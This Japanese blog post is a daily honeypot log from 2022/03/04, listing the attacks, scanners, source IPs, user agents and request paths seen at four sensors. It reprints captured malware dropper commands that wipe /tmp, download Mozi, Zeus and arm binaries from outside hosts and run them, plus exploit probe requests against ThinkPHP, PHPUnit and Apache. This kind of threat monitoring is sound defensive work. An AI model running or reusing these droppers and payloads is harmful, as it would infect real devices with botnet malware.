コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/03/04 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/03/04分です。

特徴
共通

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為

Location:JP

IDBTE4M CODE87によるスキャン行為
curlによるスキャン行為
gbrmssによるスキャン行為
/.gitへのスキャン行為
177.170.154.64に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.cssへのスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  http://23.94.7.175/.s4y/arm;
sh /tmp/arm
Location:UK

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
masscanによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  107.172.157.131/bins/Zeus.arm;
chmod 777 /tmp/Zeus.arm;
sh /tmp/Zeus.arm
cd /tmp;
rm -rf *;
wget http://123.14.248.57:53465/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
gbrmssによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  http://2.56.57.7/.s4y/arm;
sh /tmp/arm
cd /tmp;
rm -rf *;
wget http://125.119.47.65:36075/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:171 (前日比:-230)
US:総アクセス数:345 (前日比:195)
UK:総アクセス数:167 (前日比:-108)
SG:総アクセス数:175 (前日比:-206)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.121.10 Romania
1 3.23.103.69 United States
2 23.95.100.141 United States
4 27.124.32.147 Singapore
1 34.71.244.243 United States
1 34.222.137.93 United States
1 36.37.185.88 Cambodia
1 45.14.114.193 United States
1 45.61.188.220 United States
7 45.134.22.143 Netherlands
8 47.253.200.153 United States
1 52.170.6.30 United States
4 62.210.144.180 France
2 62.210.144.248 France
1 62.233.50.179 Russia
1 75.119.145.87 Germany
1 109.237.103.123 Russia
1 113.88.110.172 China
1 117.201.197.108 India
1 120.85.119.231 China
1 128.199.90.118 United Kingdom
1 132.145.39.16 United States
16 135.125.217.54 France
1 139.162.238.243 Netherlands
1 192.241.218.12 United States
1 192.241.221.210 United States
1 194.32.107.159 Norway
21 205.185.125.167 United States
21 209.141.35.105 United States
21 209.141.61.19 United States
21 209.141.61.40 United States
21 209.141.62.127 United States
2 212.193.30.157 Czechia
1 222.240.118.190 China

UserAgent一覧

件数 UserAgent
116 -
9 Go-http-client/1.1
1 Hello, world
1 IDBTE4M CODE87
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
9 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.44
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
22 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible;)
1 Mozilla/5.0 zgrab/0.x
2 curl/7.75.0
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5\n
1 \x03
2 \x16\x03\x01\x02
2 \x16\x03\x01
1 CONNECT 177[.]170[.]154[.]64:9009 HTTP/1.1
31 GET /.env HTTP/1.1
3 GET /.git HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /config.json HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /evox/about HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /info.php HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /text4041646298824 HTTP/1.1
5 GET http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpMyadmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpadmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpmy/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/phpmyadmin2/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/sql/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/sqladmin/scripts/setup.php HTTP/1.0
5 GET http[:]//18[.]179[.]20[.]5:80/ysqladmin/scripts/setup.php HTTP/1.0
1 HEAD / HTTP/1.0
1 POST /.env HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/index2.asp HTTP/1.1
1 POST /sdk HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.145.101.24 United States
1 5.188.210.227 Russia
1 23.95.100.141 United States
4 23.224.186.184 United States
1 45.134.144.143 Hong Kong
10 45.146.165.37 Russia
1 54.224.143.177 United States
1 59.99.131.76 India
1 66.240.205.34 United States
1 75.119.145.87 Germany
3 89.248.165.52 United Kingdom
202 91.225.166.195 Ukraine
1 103.41.36.107 India
1 103.145.253.195 Vietnam
1 103.168.29.186 Indonesia
2 107.172.178.67 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 139.162.238.243 Netherlands
1 159.223.130.128 United States
1 162.142.125.8 United States
1 172.104.138.223 United States
1 172.105.89.161 United States
9 185.254.196.223 Ukraine
1 192.241.218.24 United States
1 192.241.220.158 United States
1 192.241.221.237 United States
1 193.169.253.210 Poland
1 198.50.246.230 Canada
67 203.34.152.155 China
1 209.17.96.74 United States
21 209.141.52.239 United States
3 220.50.8.14 Japan

UserAgent一覧

件数 UserAgent
39 -
3 Go-http-client/1.1
1 Hello, World
67 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
202 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 Gh0st\xad
2 MGLNDD_34.68.118.83\n
4 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
19 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /11.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Application/Basic/Static/css/customerselect.css HTTP/1.1
1 GET /EIMSII/assets/bundle/commons.js HTTP/1.1
2 GET /HNAP1/ HTTP/1.1
1 GET /Loan/SubmitLogin HTTP/1.1
2 GET /PMA/ HTTP/1.1
2 GET /PMA2005/ HTTP/1.1
1 GET /Pay/index.php HTTP/1.1
1 GET /Public/Home/statics/web/js/style.js HTTP/1.1
1 GET /Public/Manage/js/cvphp.js HTTP/1.1
1 GET /Public/Wchat/js/cvphp.js HTTP/1.1
1 GET /Public/app/js/cvphp.js HTTP/1.1
1 GET /Public/home/appjs/Index.js HTTP/1.1
1 GET /Public/js/chatmsg.js HTTP/1.1
1 GET /Public/mobile/js/config.js HTTP/1.1
1 GET /Resource/webResource/js/newcheck.js HTTP/1.1
2 GET /SQLite/main.php HTTP/1.1
2 GET /SQLiteManager-1.2.4/main.php HTTP/1.1
2 GET /SQLiteManager/main.php HTTP/1.1
2 GET /SQlite/main.php HTTP/1.1
1 GET /Six/Js/class_12.js HTTP/1.1
1 GET /Template/Home/Run/record.html HTTP/1.1
1 GET /User/Reg/ HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /admin/ HTTP/1.1
1 GET /admin/css/style.css HTTP/1.1
2 GET /agSearch/SQlite/main.php HTTP/1.1
1 GET /api/v1/member/home HTTP/1.1
1 GET /app/common.js?version=2.4.43&build=1563436823 HTTP/1.1
1 GET /app/lan/BeforeLoginCn.js HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /case/ HTTP/1.1
1 GET /chs/js/lang_zh_tw.js HTTP/1.1
1 GET /cloud-app/include/css/uncall.css HTTP/1.1
1 GET /cn.gzjs HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /css/view/main/gift.css HTTP/1.1
2 GET /dbadmin/ HTTP/1.1
1 GET /eims3/assets/bundle/commons.js HTTP/1.1
1 GET /erm/help/how_to_getstarted.html HTTP/1.1
1 GET /etms/assets/bundle/commons.js HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /gai/ucms/login.php HTTP/1.1
1 GET /goip/cron.htm HTTP/1.1
2 GET /hudson/script HTTP/1.1
1 GET /images2/bankCheck.js HTTP/1.1
1 GET /index.html?findcli=-1 HTTP/1.1
1 GET /index.php?g=Pay&m=Res&a=ispay HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index/index/ajaxreg.shtml HTTP/1.1
1 GET /index/index/register1/type/1.html HTTP/1.1
1 GET /index2.php HTTP/1.1
1 GET /index3.php?m=Order&a=hetong&id=999999 HTTP/1.1
1 GET /js/guest.js HTTP/1.1
1 GET /js/room.js HTTP/1.1
1 GET /js/sms.js HTTP/1.1
1 GET /jsonpublic/selectAddtion.asp HTTP/1.1
1 GET /lateron.asp HTTP/1.1
2 GET /main.php HTTP/1.1
1 GET /mindex/statics/js/qiandao.js HTTP/1.1
1 GET /mmbh/login.php HTTP/1.1
2 GET /myadmin/ HTTP/1.1
2 GET /mysql-admin/ HTTP/1.1
2 GET /mysql/ HTTP/1.1
2 GET /mysqladmin/ HTTP/1.1
2 GET /mysqlmanager/ HTTP/1.1
2 GET /openserver/phpmyadmin/ HTTP/1.1
2 GET /p/m/a/ HTTP/1.1
1 GET /pczs/js/trendChart.js HTTP/1.1
2 GET /php-my-admin/ HTTP/1.1
2 GET /php-myadmin/ HTTP/1.1
2 GET /phpMyAdmin-2.2.3/ HTTP/1.1
2 GET /phpMyAdmin-2.2.6/ HTTP/1.1
2 GET /phpMyAdmin-2.5.1/ HTTP/1.1
2 GET /phpMyAdmin-2.5.4/ HTTP/1.1
2 GET /phpMyAdmin-2.5.5-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.5.5-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.5.5-rc2/ HTTP/1.1
2 GET /phpMyAdmin-2.5.5/ HTTP/1.1
2 GET /phpMyAdmin-2.5.6-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.5.6-rc2/ HTTP/1.1
2 GET /phpMyAdmin-2.5.6/ HTTP/1.1
2 GET /phpMyAdmin-2.5.7-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.5.7/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-alpha/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-alpha2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-beta1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-beta2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-pl2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-pl3/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-rc2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0-rc3/ HTTP/1.1
2 GET /phpMyAdmin-2.6.0/ HTTP/1.1
2 GET /phpMyAdmin-2.6.1-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.1-pl2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.1-pl3/ HTTP/1.1
2 GET /phpMyAdmin-2.6.1-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.1-rc2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.2-beta1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.2-pl1/ HTTP/1.1
4 GET /phpMyAdmin-2.6.2-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.3-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.3-rc1/ HTTP/1.1
4 GET /phpMyAdmin-2.6.3/ HTTP/1.1
2 GET /phpMyAdmin-2.6.4-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.4-pl2/ HTTP/1.1
2 GET /phpMyAdmin-2.6.4-pl3/ HTTP/1.1
2 GET /phpMyAdmin-2.6.4-pl4/ HTTP/1.1
2 GET /phpMyAdmin-2.6.4-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.4/ HTTP/1.1
2 GET /phpMyAdmin-2.7.0-beta1/ HTTP/1.1
2 GET /phpMyAdmin-2.7.0-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.7.0-pl2/ HTTP/1.1
2 GET /phpMyAdmin-2.7.0-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.7.0/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0-beta1/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0-rc2/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0.1/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0.2/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0.3/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0.4/ HTTP/1.1
2 GET /phpMyAdmin-2.8.0/ HTTP/1.1
2 GET /phpMyAdmin-2.8.1-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.8.1/ HTTP/1.1
2 GET /phpMyAdmin-2.8.2/ HTTP/1.1
2 GET /phpMyAdmin-2/ HTTP/1.1
2 GET /phpMyAdmin/ HTTP/1.1
2 GET /phpMyAdmin2/ HTTP/1.1
1 GET /phpcms/modules/member/touzi.php HTTP/1.1
2 GET /phpmanager/ HTTP/1.1
2 GET /phpmy-admin/ HTTP/1.1
2 GET /phpmyadmin/ HTTP/1.1
2 GET /phpmyadmin2/ HTTP/1.1
2 GET /pma/ HTTP/1.1
2 GET /pma2005/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/static/js/main.js HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /robots.txt HTTP/1.1
2 GET /script HTTP/1.1
1 GET /scripts/LoadAjaxIco.js HTTP/1.1
3 GET /shell?cd+/tmp;rm+-rf+*;wget+ http[:]//23[.]94[.]7[.]175/.s4y/arm;sh+/tmp/arm
1 GET /sitemap.xml HTTP/1.1
1 GET /smb_scheduler/cdr.htm HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /source/pack/upload/install/ios.php HTTP/1.1
2 GET /sqlite/main.php HTTP/1.1
2 GET /sqlitemanager/main.php HTTP/1.1
2 GET /sqlmanager/ HTTP/1.1
2 GET /sqlweb/ HTTP/1.1
1 GET /static/admin/js/cvphp.js HTTP/1.1
1 GET /static/css/system/login.css?v=SimCloud%20V1.1.0_2018112816 HTTP/1.1
1 GET /static/home/static/js/iindex.js HTTP/1.1
1 GET /static/index.css HTTP/1.1
1 GET /static/index/js/lk/order.js HTTP/1.1
1 GET /static/js/base.js HTTP/1.1
1 GET /static/js/lang_json_cn.js HTTP/1.1
1 GET /static/js/winScale.js HTTP/1.1
1 GET /static/new/js/shangchuan.js HTTP/1.1
1 GET /static/pcweb/js/newcheck.js HTTP/1.1
1 GET /statics/js/hui.js HTTP/1.1
2 GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /trade/quote/list HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /views/bank/bank.html HTTP/1.1
1 GET /views/ucenter/ucenter.js HTTP/1.1
1 GET /web/api/getConfig?type=several&keys=www_app_base:downloadUrl1,www_app_base:downloadUrl4&accessToken=undefined HTTP/1.1
2 GET /webadmin/ HTTP/1.1
2 GET /webdb/ HTTP/1.1
2 GET /websql/ HTTP/1.1
1 GET /wx/ZFpass.asp HTTP/1.1
1 GET http[:]//34[.]68[.]118[.]83:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.1/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.10.1/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpMyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpmy/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/phpmyadmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/sql/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/sqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//34[.]68[.]118[.]83:80/ysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
2 GET http[:]//www[.]msftncsi[.]com/ncsi.txt HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 23.95.100.141 United States
6 45.146.165.37 Russia
2 49.143.32.6 South Korea
1 52.234.146.147 United States
1 62.233.50.179 Russia
1 66.240.205.34 United States
1 74.208.187.79 United States
1 75.119.145.87 Germany
1 75.185.202.94 United States
3 89.248.165.52 United Kingdom
1 92.63.173.8 Netherlands
1 109.237.103.123 Russia
1 123.14.248.57 China
7 123.110.220.82 Taiwan
3 137.220.133.42 Singapore
1 139.162.238.243 Netherlands
101 156.96.155.234 United States
1 162.142.125.8 United States
1 162.142.125.221 United States
1 167.94.138.120 United States
1 172.105.89.161 United States
1 185.101.33.161 Norway
1 192.241.216.195 United States
1 192.241.218.80 United States
1 192.241.218.126 United States
1 192.241.219.195 United States
1 209.17.96.90 United States
21 209.141.61.40 United States
1 210.210.26.37 India
1 212.192.241.99 Czechia

UserAgent一覧

件数 UserAgent
38 -
3 Go-http-client/1.1
1 Hello, world
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
101 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 Gecko/20100101
3 Mozilla/5.0 zgrab/0.x
1 masscan/1.0 (https[:]//github[.]com/robertdavidgraham/masscan)

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 Gh0st\xad
1 MGLNDD_132.145.66.34\n
1 \x03
2 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /PMA/ HTTP/1.1
1 GET /PMA2005/ HTTP/1.1
1 GET /SQLite/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /SQLiteManager/main.php HTTP/1.1
1 GET /SQlite/main.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin.php HTTP/1.0
1 GET /admin/ HTTP/1.1
1 GET /agSearch/SQlite/main.php HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
3 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /dbadmin/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson/script HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /myadmin/ HTTP/1.1
1 GET /mysql-admin/ HTTP/1.1
1 GET /mysql/ HTTP/1.1
1 GET /mysqladmin/ HTTP/1.1
1 GET /mysqlmanager/ HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /openserver/phpmyadmin/ HTTP/1.1
1 GET /p/m/a/ HTTP/1.1
1 GET /php-my-admin/ HTTP/1.1
1 GET /php-myadmin/ HTTP/1.1
1 GET /phpMyAdmin-2.2.3/ HTTP/1.1
1 GET /phpMyAdmin-2.2.6/ HTTP/1.1
1 GET /phpMyAdmin-2.5.1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.4/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6/ HTTP/1.1
1 GET /phpMyAdmin-2.5.7-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.7/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-alpha/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-alpha2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-beta2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-pl3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-rc1/ HTTP/1.1
